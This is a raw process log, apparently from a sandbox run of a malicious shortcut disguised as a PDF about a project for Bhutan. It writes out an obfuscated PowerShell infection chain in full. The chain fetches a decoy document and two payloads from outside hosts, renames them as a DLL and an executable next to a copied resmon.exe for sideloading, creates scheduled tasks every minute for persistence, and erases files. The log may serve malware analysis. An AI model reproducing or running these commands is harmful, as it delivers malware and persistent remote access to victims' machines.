cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "PZFlafErlokfv" C:\Users\test22\AppData\Local\Temp\Large_Innovation_Project_for_Bhutan.pdf.lnk
2580powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w""i 1 $ProgressPreference = 'SilentlyContinue';i''w''r https://adaptation-funds.org/documents/Large_Innovation_Project_for_Bhutan.pdf -OutFile C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf;s''a''p''s C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf;i''w''r https://beijingtv.org/wpytd52vDw/brtd2389aw -OutFile "C:\Users\Public\hal";r''e''n -Path "C:\Users\Public\hal" -NewName "C:\Users\Public\edputil.dll";i''w''r https://beijingtv.org/ogQas32xzsy6/fRgt9azswq1e -OutFile "C:\Users\Public\sam";r''e''n -Path "C:\Users\Public\sam" -NewName "C:\Users\Public\Winver.exe";c''p C:\Windows\System32\resmon.exe C:\Users\Public\resmon.exe;c''p''i 'C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf' -destination .;sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUpdate /tr 'C:\Users\Public\resmon';sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUppdate /tr 'C:\Users\Public\Winver';e''r''a''s''e *d?.?n?
2692schtasks.exe "C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUpdate /tr C:\Users\Public\resmon
2852schtasks.exe "C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUppdate /tr C:\Users\Public\Winver
2900